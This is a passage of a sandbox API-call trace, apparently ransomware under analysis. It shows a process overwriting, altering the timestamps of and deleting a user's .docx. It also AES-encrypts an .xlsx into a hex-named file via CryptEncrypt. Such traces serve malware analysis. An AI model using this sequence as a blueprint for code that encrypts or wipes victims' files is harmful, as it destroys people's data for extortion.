HALPmcxz\\Documents\\r33XDXTp.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", lpFilePart=0x0) returned 0x35 [0075.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0075.522] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r33xdxtp.docx"), fInfoLevelId=0x0, lpFileInformation=0x225d200 | out: lpFileInformation=0x225d200*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x65348f60, ftCreationTime.dwHighDateTime=0x1d4e5e2, ftLastAccessTime.dwLowDateTime=0x5aa029a0, ftLastAccessTime.dwHighDateTime=0x1d4db66, ftLastWriteTime.dwLowDateTime=0x5aa029a0, ftLastWriteTime.dwHighDateTime=0x1d4db66, nFileSizeHigh=0x0, nFileSizeLow=0x2e4a)) returned 1 [0075.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0075.523] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", lpFilePart=0x0) returned 0x35 [0075.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0075.523] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r33xdxtp.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.523] GetFileType (hFile=0x36c) returned 0x1 [0075.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0075.523] GetFileType (hFile=0x36c) returned 0x1 [0075.523] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.524] WriteFile (in: hFile=0x36c, lpBuffer=0x225d688*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225d688*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.524] WriteFile (in: hFile=0x36c, lpBuffer=0x225d688*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225d688*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.525] WriteFile (in: hFile=0x36c, lpBuffer=0x225d688*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x225d688*, lpNumberOfBytesWritten=0x1bf5daa8*=0x1000, lpOverlapped=0x0) returned 1 [0075.525] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.526] WriteFile (in: hFile=0x36c, lpBuffer=0x225d688*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225d688*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.527] WriteFile (in: hFile=0x36c, lpBuffer=0x225d688*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225d688*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.527] WriteFile (in: hFile=0x36c, lpBuffer=0x225d688*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x225d688*, lpNumberOfBytesWritten=0x1bf5daa8*=0x1000, lpOverlapped=0x0) returned 1 [0075.527] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.528] WriteFile (in: hFile=0x36c, lpBuffer=0x225d688*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225d688*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.529] WriteFile (in: hFile=0x36c, lpBuffer=0x225d688*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225d688*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.530] WriteFile (in: hFile=0x36c, lpBuffer=0x225d688*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x225d688*, lpNumberOfBytesWritten=0x1bf5daa8*=0x1000, lpOverlapped=0x0) returned 1 [0075.530] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.530] WriteFile (in: hFile=0x36c, lpBuffer=0x225d688*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225d688*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.531] WriteFile (in: hFile=0x36c, lpBuffer=0x225d688*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x225d688*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.532] WriteFile (in: hFile=0x36c, lpBuffer=0x225d688*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x225d688*, lpNumberOfBytesWritten=0x1bf5daa8*=0x1000, lpOverlapped=0x0) returned 1 [0075.532] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.532] SetEndOfFile (hFile=0x36c) returned 1 [0075.533] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.533] CloseHandle (hObject=0x36c) returned 1 [0075.533] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", lpFilePart=0x0) returned 0x35 [0075.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.533] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r33xdxtp.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.533] GetFileType (hFile=0x36c) returned 0x1 [0075.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.533] GetFileType (hFile=0x36c) returned 0x1 [0075.533] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.533] CloseHandle (hObject=0x36c) returned 1 [0075.534] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", lpFilePart=0x0) returned 0x35 [0075.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.534] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r33xdxtp.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.534] GetFileType (hFile=0x36c) returned 0x1 [0075.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.534] GetFileType (hFile=0x36c) returned 0x1 [0075.534] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0075.534] CloseHandle (hObject=0x36c) returned 1 [0075.534] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", lpFilePart=0x0) returned 0x35 [0075.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.534] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r33xdxtp.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.534] GetFileType (hFile=0x36c) returned 0x1 [0075.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.535] GetFileType (hFile=0x36c) returned 0x1 [0075.535] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0075.535] CloseHandle (hObject=0x36c) returned 1 [0075.535] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", lpFilePart=0x0) returned 0x35 [0075.535] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\r33xdxtp.docx")) returned 1 [0075.535] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\r33XDXTp.docx", lpFilePart=0x0) returned 0x35 [0075.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29", lpFilePart=0x0) returned 0x48 [0075.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.536] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8d54870050b66787f2beed84fc4d9a29"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.536] GetFileType (hFile=0x36c) returned 0x1 [0075.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.536] GetFileType (hFile=0x36c) returned 0x1 [0075.536] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.536] CloseHandle (hObject=0x36c) returned 1 [0075.537] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29", lpFilePart=0x0) returned 0x48 [0075.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.537] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8d54870050b66787f2beed84fc4d9a29"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.537] GetFileType (hFile=0x36c) returned 0x1 [0075.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.537] GetFileType (hFile=0x36c) returned 0x1 [0075.537] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0075.537] CloseHandle (hObject=0x36c) returned 1 [0075.537] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29", lpFilePart=0x0) returned 0x48 [0075.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.537] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8D54870050B66787F2BEED84FC4D9A29" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8d54870050b66787f2beed84fc4d9a29"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.537] GetFileType (hFile=0x36c) returned 0x1 [0075.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.537] GetFileType (hFile=0x36c) returned 0x1 [0075.537] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0075.538] CloseHandle (hObject=0x36c) returned 1 [0075.538] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", lpFilePart=0x0) returned 0x34 [0075.538] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", lpFilePart=0x0) returned 0x34 [0075.539] CryptAcquireContextW (in: phProv=0x1bf5da68, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5da68*=0x1a5b7e10) returned 1 [0075.540] CryptImportKey (in: hProv=0x1a5b7e10, pbData=0x22609e0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x4ce9f0) returned 1 [0075.540] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.540] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.540] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2260ad0, pdwDataLen=0x1bf5db30 | out: pbData=0x2260ad0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.540] CryptImportKey (in: hProv=0x1a5b7e10, pbData=0x2260bf0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626b40) returned 1 [0075.540] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.540] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.540] CryptDuplicateKey (in: hKey=0x1a626b40, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626e50) returned 1 [0075.540] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.540] CryptSetKeyParam (hKey=0x1a626e50, dwParam=0x4, pbData=0x2260d38*=0x1, dwFlags=0x0) returned 1 [0075.540] CryptSetKeyParam (hKey=0x1a626e50, dwParam=0x1, pbData=0x2260ce8, dwFlags=0x0) returned 1 [0075.540] CryptDestroyKey (hKey=0x1a626b40) returned 1 [0075.540] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0075.540] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx", lpFilePart=0x0) returned 0x34 [0075.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Uh8zTJx.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uh8ztjx.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.541] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F", lpFilePart=0x0) returned 0x48 [0075.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.541] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\76c434b6d1b4879e2d990666cbcedb8f"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x358 [0075.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.541] ReadFile (in: hFile=0x36c, lpBuffer=0x22610e8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x22610e8*, lpNumberOfBytesRead=0x1bf5da28*=0x14000, lpOverlapped=0x0) returned 1 [0075.543] CryptEncrypt (in: hKey=0x1a626e50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2275100*, pdwDataLen=0x1bf5da80*=0x14000, dwBufLen=0x14000 | out: pbData=0x2275100*, pdwDataLen=0x1bf5da80*=0x14000) returned 1 [0075.546] ReadFile (in: hFile=0x36c, lpBuffer=0x22610e8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x22610e8*, lpNumberOfBytesRead=0x1bf5da28*=0x183e, lpOverlapped=0x0) returned 1 [0075.546] CryptEncrypt (in: hKey=0x1a626e50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2289140*, pdwDataLen=0x1bf5da80*=0x1830, dwBufLen=0x1830 | out: pbData=0x2289140*, pdwDataLen=0x1bf5da80*=0x1830) returned 1 [0075.547] ReadFile (in: hFile=0x36c, lpBuffer=0x22610e8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x22610e8*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0075.547] CryptEncrypt (in: hKey=0x1a626e50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x228a9b0*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x228a9b0*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.547] CryptEncrypt (in: hKey=0x1a626e50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x228aa00*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x228aa00*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.547] WriteFile (in: hFile=0x358, lpBuffer=0x228aa50*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x228aa50*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0075.547] CloseHandle (hObject=0x358) returned 1 [0075.549] CloseHandle (hObject=0x36c) returned 1 [0075.549] CryptDestroyKey (hKey=0x4ce9f0) returned 1 [0075.549] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0075.549] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0075.549] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F", lpFilePart=0x0) returned 0x48 [0075.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0075.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\76C434B6D1B4879E2D990666CBCEDB8F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\76c434b6d1b4879e2d990666cbcedb8f"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.549] GetFileType (hFile=0x36c) returned 0x1 [0075.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0075.549] GetFileType (hFile=0x36c) returned 0x1 [0075.549] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.558] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.559] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.561] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.562] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.562] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.562] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.562] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.562] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.562] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.562] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.562] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.562] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.563] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.563] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x228c148*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.563] ReadFile (in: hFile=0x36c, lpBuffer=0x228c148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: 